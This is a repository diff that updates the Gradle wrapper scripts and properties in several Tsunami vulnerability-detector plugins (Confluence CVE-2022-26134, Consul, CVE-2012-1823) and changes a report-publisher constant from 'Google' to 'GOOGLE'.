############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/confluence/cve202226134/gradlew.bat b/google/detectors/rce/confluence/cve202226134/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/confluence/cve202226134/gradlew.bat +++ b/google/detectors/rce/confluence/cve202226134/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java b/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java index 7c66c6b9d..b4f2ae19a 100644 --- a/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java +++ b/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java @@ -68,7 +68,7 @@ public final class ConfluenceOgnlInjectionRceDetector implements VulnDetector { "", "unknown", // nmap could not determine the service name, we try to exploit anyway. "opsmessaging"); // nmap returns opsmessaging service name for port 8090. - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE_2022_26134"; @VisibleForTesting diff --git a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/consul/gradlew b/google/detectors/rce/consul/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/consul/gradlew +++ b/google/detectors/rce/consul/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/consul/gradlew.bat b/google/detectors/rce/consul/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/consul/gradlew.bat +++ b/google/detectors/rce/consul/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java b/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java index 83b13df75..abfa67332 100644 --- a/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java +++ b/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java @@ -66,7 +66,7 @@ // nmap returns fmtp for the Consul admin endpoint @ForServiceName({"fmtp"}) public final class ConsulEnableScriptChecksCommandExecutionDetector implements VulnDetector { - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CONSUL_ENABLE_SCRIPT_CHECKS_COMMAND_EXECUTION"; diff --git a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ 